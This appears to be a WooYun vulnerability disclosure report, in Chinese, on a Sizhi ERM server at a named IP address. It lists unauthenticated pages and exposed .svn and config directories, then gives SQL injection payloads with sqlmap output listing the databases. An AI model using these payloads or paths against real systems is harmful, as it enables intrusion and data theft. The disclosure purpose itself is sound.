WooYun.org

问题站点：
http://58.56.128.139:9999

要安装证书，我就不安装了，可以看到是思智ERM管理中心
百度了下：
思智ERM （Enterprise Right Management ）是针对于企业级用户的数据安全管理系统。它不但能够对 Microsoft Office 、 CAD 、 PDF 等任意格式的电子文档及设计图纸进行加密保护，并且能够对加密的文件进行细分化的应用权限设置和备份保护。确保企业的机密数据只能被经过授权的人，在授权的应用环境中（例如企业内部），在指定的时间内，进行指定的应用操作，并且整个过程会被详细、完整的记录下来。
一、未授权访问
http://58.56.128.139:9999/dev_password.php

http://58.56.128.139:9999/user_rapid_bind.php

http://58.56.128.139:9999/php/WebDocList.php

点击“新建word文档”，出现如下界面：

还有好多，不举例了。
二、目录遍历
http://58.56.128.139:9999/auditfile/
http://58.56.128.139:9999/config/ 导致svn配置文件遍历下载了

http://58.56.128.139:9999/.svn/

好多，不举例了。
三、sql注入
注入点：
http://58.56.128.139:9999/audit_client_query.php?userid=1 (GET)
---
Place: GET
Parameter: userid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=1 AND 5292=5292
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: userid=-9648 UNION ALL SELECT CHAR(113)+CHAR(100)+CHAR(122)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(70)+CHAR(81)+CHAR(69)+CHAR(114)+CHAR(75)+CHAR(82)+CHAR(107)+CHAR(113)+CHAR(120)+CHAR(108)+CHAR(105)+CHAR(113)--
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: Microsoft SQL Server 2000
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] sageerm4
[*] tempdb
业务表如下：